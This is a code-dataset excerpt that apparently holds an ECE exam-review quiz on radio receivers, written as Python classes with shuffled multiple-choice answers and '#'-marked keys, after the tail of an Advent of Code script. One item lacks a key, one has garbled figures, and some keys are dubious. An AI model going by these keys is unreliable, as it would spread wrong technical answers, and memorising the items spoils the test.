4\n stack_counter += 1\n \nfor move in moves.split('\\n'):\n [_, count, _, move_from, _, move_to] = move.split()\n count, move_from, move_to = int(count), int(move_from), int(move_to)\n crane_stack = []\n for i in range(count):\n crate = stacks[move_from].pop(0)\n crane_stack.append(crate)\n stacks[move_to] = crane_stack + stacks[move_to]\n\n\n\nfinal_string = ''\nfor i in range(1, len(stacks)+1):\n final_string += stacks[i][0]\n\ntime_end = time.time()\n\nresult = final_string\nprint(f'I took this much: {time_end-time_start}s')\nprint(\"Result: {}\".format(result))\n","repo_name":"kibartas/AOC","sub_path":"kibartas/2022/05/wip.py","file_name":"wip.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5879370288","text":"import random\n\nclass ece_radio_receivers_section_1_1():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'its resistance value'\n\t\tchoice_b = 'its operating temperature #'\n\t\tchoice_c = 'both its resistance and operating temperature'\n\t\tchoice_d = 'none of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The noise generated by a resistor depends upon\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_2():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'the IF stage has better selectivity than the RF stage #'\n\t\tchoice_b = 'the RF stage has better selectivity than the IF stage'\n\t\tchoice_c = 'the RF and IF stages have the same selectivity'\n\t\tchoice_d = 'none of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a superheterodyne receiver \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_3():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'rectify the input signal'\n\t\tchoice_b = 'discard the carrier'\n\t\tchoice_c = 'provide audio signal'\n\t\tchoice_d = 'all of the choices #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The function of an AM detector circuit is to\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_4():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'variable selectivity'\n\t\tchoice_b = 'variable sensitivity #'\n\t\tchoice_c = 'double conversion'\n\t\tchoice_d = 'squelch'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which of the following should be used in order to prevent overloading of the last IF amplifier in a receiver?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_5():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '433 kHz'\n\t\tchoice_b = '455 kHz #'\n\t\tchoice_c = '545 kHz'\n\t\tchoice_d = '555 kHz'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Most popular IF for receivers tuning from 540 to 1650 kHz is \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_6():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'the local oscillator operates below the signal frequency'\n\t\tchoice_b = 'local oscillator frequency is normally double the IF'\n\t\tchoice_c = 'RF amplifier normally works at frequencies above the carrier frequency'\n\t\tchoice_d = 'mixer input must be tuned to the signal frequency #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a broadcast superheterodyne receiver\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_7():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'feed more than one receiver from a single antenna'\n\t\tchoice_b = 'connect two transmitters to the same antenna'\n\t\tchoice_c = 'connect a receiver and a transmitter to the same antenna #'\n\t\tchoice_d = 'none of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A duplexer is a device used to \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_8():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'modulator'\n\t\tchoice_b = 'mixer #'\n\t\tchoice_c = 'demodulator'\n\t\tchoice_d = 'frequency translator'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A heterodyne frequency changer is called a\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_9():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'improved image frequency rejection'\n\t\tchoice_b = 'improved rejection of adjacent unwanted signals'\n\t\tchoice_c = 'prevention of re-radiation of the local oscillator through the antenna of the receiver'\n\t\tchoice_d = 'all of the choices #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"RF amplifiers are used in radio receivers for\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_10():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'higher at low frequencies and lower at high frequencies'\n\t\tchoice_b = 'low at high and low frequencies and max at the midrange frequencies'\n\t\tchoice_c = 'relatively uniform at all frequencies #'\n\t\tchoice_d = 'low at lower frequencies and higher at higher frequencies'\t\t\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The sensitivity curve of a standard receiver is\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_11():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '30, 60 and, 70 kHz'\n\t\tchoice_b = '3, 6, and 7 kHz'\n\t\tchoice_c = '30, 60, and 70 MHz #'\n\t\tchoice_d = '3, 6, and 7 GHz'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which are the popular IF frequencies for microwave and radar receivers operating on frequencies in the range 1 to 10 GHz?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_12():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'the linearity is worse than in a phase discriminator #'\n\t\tchoice_b = 'the output is twice that obtainable from a similar phase discriminator'\n\t\tchoice_c = 'stabilization against signal strength variations is provided'\n\t\tchoice_d = 'the circuit is the same as in a discriminator, except that the diodes are reversed'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a ratio detector\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_13():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'stop oscillation #'\n\t\tchoice_b = 'increase bandwidth'\n\t\tchoice_c = 'improve selectivity'\n\t\tchoice_d = 'all of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Neutralization is used in RF amplifiers to \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_14():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'fs - 2 fi'\n\t\tchoice_b = 'fs + 2 fi #'\n\t\tchoice_c = '(fs + fi) / 2'\n\t\tchoice_d = '(fs - fi) / 2'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"If the signal frequency is (fs) and the intermediate frequency is (fi), the image frequency is given by\t\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_15():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'will increase'\n\t\tchoice_b = 'will decrease #'\n\t\tchoice_c = 'will remain constant'\n\t\tchoice_d = 'will reduce to a negligible value'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"It is known that noise phase modulates the FM wave. As the noise side band frequency approaches the carrier frequency, the noise amplitude will\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_16():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'demodulator #'\n\t\tchoice_b = 'loudspeaker'\n\t\tchoice_c = 'audio amplifier'\n\t\tchoice_d = 'frequency changer'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a receiver, which of the following devices has IF input by no RF output?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_17():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'Resistance noise'\n\t\tchoice_b = 'Partition noise #'\n\t\tchoice_c = 'Flicker noise'\n\t\tchoice_d = 'Shot noise'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Transistors are free from which type of noise?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_18():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'MF #'\n\t\tchoice_b = 'HF'\n\t\tchoice_c = 'VHF'\n\t\tchoice_d = 'UHF'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Standard AM radio broadcasts are confined to\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_19():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'the highest AGC voltage is produced between stations'\n\t\tchoice_b = 'the faster the AGC time constant, the more accurate the output'\n\t\tchoice_c = 'an increase in signal strength produces more AGC #'\n\t\tchoice_d = 'the audio stage gain is normally controlled by the AGC'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a radio receiver with simple AGC\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_20():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'Complete phase-shift generator'\n\t\tchoice_b = 'Product Detector'\n\t\tchoice_c = 'Diode Balanced Modulator'\n\t\tchoice_d = 'Bipolar Transistor Balanced Modulator #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which of the following cannot be used to demodulate SSB?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_21():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'carrier frequencies'\n\t\tchoice_b = 'audio frequencies'\n\t\tchoice_c = 'radio frequencies #'\n\t\tchoice_d = 'none of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A transmitter serial current contains\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_22():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '24.09 MHz'\n\t\tchoice_b = '24.54 MHz'\n\t\tchoice_c = '25.45 MHz'\n\t\tchoice_d = '25.91 MHz #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a broadcast superheterodyne receiver having no RF amplifier, the loaded Q of the antenna coupling circuit is 100. If the intermediate frequency is 455 kHz, the image frequency at 25 MHz willl be\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_23():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'at the transmitter'\n\t\tchoice_b = 'in the channel #'\n\t\tchoice_c = 'at the information source'\n\t\tchoice_d = 'at the destination'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a communication system, noise is likely to affect the signal\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_24():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'absolute temperature #'\n\t\tchoice_b = '(absolute temperature)^2'\n\t\tchoice_c = '1 / (abosolute temperature)'\n\t\tchoice_d = '1/ sqrt(absolute temperature)'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The noise produced by a resistor is proportional to \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_25():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'selectivity will be poor #'\n\t\tchoice_b = 'tracking difficulties will be least'\n\t\tchoice_c = 'adjacent channel rejection will improve'\n\t\tchoice_d = 'all of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a radio receiver, if the intermediate frequency is too high\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_26():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '1655 kHz'\n\t\tchoice_b = '2110 kHz #'\n\t\tchoice_c = '745 kHz'\n\t\tchoice_d = '910 kHz'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a superheterodyne receiver, the IF is 455 kHz. If it is tuned to 1200 kHz, the image frequency will be at\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_27():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'sensitivity'\n\t\tchoice_b = 'characteristics of the IF section #'\n\t\tchoice_c = 'antenna direction '\n\t\tchoice_d = 'all of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The selectivity of most receiverse is determined largely by\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_28():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '750 kHz'\n\t\tchoice_b = '990 kHz'\n\t\tchoice_c = '1650 kHz'\n\t\tchoice_d = '2100 kHz'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a superheterodyne receiver with an IF of 450 kHz is tuned to a signal at 1200 kHz. The image frequency is \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_29():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '1.116 #'\n\t\tchoice_b = '1.386'\n\t\tchoice_c = '2.116'\n\t\tchoice_d = '2.386'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a broadcast superheterodyne receiver having no RF amplifierm the loaded Q of the antenna coupling circuit is 100. If the intermediate frequency is 455 kHz, the rejection ratio at 25 MHz will be\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\n\nclass ece_radio_receivers_section_1_31():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'high gain and high sensitivity #'\n\t\tchoice_b = 'better selectivity at higher frequencies'\n\t\tchoice_c = 'stability'\n\t\tchoice_d = 'noise suppression'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"As compared to tuned radio frequency receivers which of the following is the advantage of using superheterodyne receivers?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_32():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'Image frequency rejection will improve'\n\t\tchoice_b = 'selectivity will be too sharp #'\n\t\tchoice_c = 'the frequency selectivity of the local oscillator will have to be lowered'\n\t\tchoice_d = 'all of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a radio receiver, if the intermediate frequency is too low\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_33():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'discard the carrier'\n\t\tchoice_b = 'facilitate tracking #'\n\t\tchoice_c = 'filter the input signal'\n\t\tchoice_d = 'suppress noise'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Padders are used in a receiver to\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_34():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'lower than the incoming frequency'\n\t\tchoice_b = 'higher than the incoming frequency #'\n\t\tchoice_c = 'equal to the incoming frequency'\n\t\tchoice_d = 'any of the situations'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a radio receiver, the local oscillator is tuned to a frequency \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_35():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'colpitts'\n\t\tchoice_b = 'clapp'\n\t\tchoice_c = 'armstrong #'\n\t\tchoice_d = 'ultra'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which of the following oscillator is generally not used at VHF?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_36():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '114 kohms'\n\t\tchoice_b = '336 kohms #'\n\t\tchoice_c = '384 kohms'\n\t\tchoice_d = '455 kohms'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"An unmodulated voltage 10 V effective is applied to a diode detector in which load resistance is 4e-5 ohms. A micrometer shows that the rectified DC current in this resistance is 30 A. The input resistance of the detector is\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\n\nclass ece_radio_receivers_section_1_37():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'DC voltage'\n\t\tchoice_b = 'modulating signal'\n\t\tchoice_c = 'RF ripple'\n\t\tchoice_d = 'all of the choices #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The output of a diode detector contains\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_38():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'partition noise #'\n\t\tchoice_b = 'shot noise'\n\t\tchoice_c = 'flicker noise'\n\t\tchoice_d = 'resistance noise'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which of the following noise does not occue in transistors?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\n\nclass ece_radio_receivers_section_1_39():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'partition noise'\n\t\tchoice_b = 'white noise'\n\t\tchoice_c = 'thermal noise #'\n\t\tchoice_d = 'shot noise'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Noise generated in a resistor is also known as \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_40():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'variable tuning inductor'\n\t\tchoice_b = 'ganged tuning inductor #'\n\t\tchoice_c = 'variable capacitor'\n\t\tchoice_d = 'variable preset'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which of the following is used to provide tracking between RF amplifier and local oscillator stages of a receiver?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_41():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'its ability to reject unwanted signals #'\n\t\tchoice_b = 'its ability to amplify weak signals'\n\t\tchoice_c = 'the frequency at which it gives maximum amplification to signal'\n\t\tchoice_d = 'its ability to suppress noise'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The selectivity of a radio receiver is \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_42():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'unsuitability will occur'\n\t\tchoice_b = 'heterodyne whistles will be heard'\n\t\tchoice_c = 'tuning to the frequency band immediately adjacent to the intermediate frequency will become impossible'\n\t\tchoice_d = 'all of the choices #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"If the intermediate frequency of a superheterodyne falls within the tuning range of the receiver\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_43():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'audio amplifiers'\n\t\tchoice_b = 'RF amplifier'\n\t\tchoice_c = 'full wave rectifier'\n\t\tchoice_d = 'magic eye #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"EM 84 tube is used in radio receivers as\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\n\nclass ece_radio_receivers_section_1_44():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'Double conversion is used to improve image rejection'\n\t\tchoice_b = 'Double conversion is used to improve selectivity'\n\t\tchoice_c = 'Variable sensitivity is used to improve selectivity'\n\t\tchoice_d = 'Variable sensitivity is used to eliminate selective fading #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which of the following statements about receivers is false?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_45():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'increasese with modulating signal power'\n\t\tchoice_b = 'decreases with modulating signal power'\n\t\tchoice_c = 'is independent of the modulating signal power #'\n\t\tchoice_d = 'none of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Modulated carrier power in FM\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_46():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'detect the modulating signal'\n\t\tchoice_b = 'amplify the received modulated carrier '\n\t\tchoice_c = 'shift the frequency of the received modulated carrier to the IF band #'\n\t\tchoice_d = 'none of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In superheterodyne receiversm the local oscillator is used to\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_47():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'demodulator'\n\t\tchoice_b = 'AGC'\n\t\tchoice_c = 'IF amplifier #'\n\t\tchoice_d = 'all of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which of the following is the same in AM and FM receivers?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_48():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'reduce receiver gain at some specific frequency #'\n\t\tchoice_b = 'increase receiver gain at some specific frequency'\n\t\tchoice_c = 'make selectivity more precise'\n\t\tchoice_d = 'spread the bandwidth'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, 